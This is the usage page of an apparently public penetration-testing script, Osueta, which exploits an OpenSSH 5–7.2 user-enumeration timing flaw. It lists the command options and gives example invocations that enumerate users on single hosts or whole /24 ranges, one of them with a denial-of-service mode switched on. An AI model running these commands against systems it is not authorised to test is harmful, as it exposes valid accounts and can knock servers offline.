Osueta is a simple Python2 script that allows you to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH version 5 to 7.2. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DOS condition in the OpenSSH server.

Usage:

usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
              [-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH]
              [-c VERS] [--dos DOS] [-t THREADS]
 
 OpenSSH User Enumeration Time-Based Attack Python script
 
 optional arguments:
 -h, --help  show this help message and exit
 -H HOST     Host Ip or CIDR netblock.
 -k HFILE    Host list in a file.
 -f FQDN     FQDN to attack.
 -p PORT     Host port.
 -L UFILE    Username list file.
 -U USER     Only use a single username.
 -d DELAY    Time delay fixed in seconds. If not, delay time is calculated.
 -v VARI     Make variations of the username (default yes).
 -o OUTP     Output file with positive results.
 -l LENGTH   Length of the password in characters (x1000) (default 40).
 -c VERS     Check or not the OpenSSH version (default yes).
 --dos DOS   Try to make a DOS attack (default no).
 -t THREADS  Threads for the DOS attack (default 5).
 

Examples:

• A single user enumeration attempt with username variations:

./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes

• A single user enumeration attempt with no user variations a dos attack:

./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes

• Scanning a C class network with only one user:

./osueta -H 192.168.1.0/24 -p 22 -U root -v no

• Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:

./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50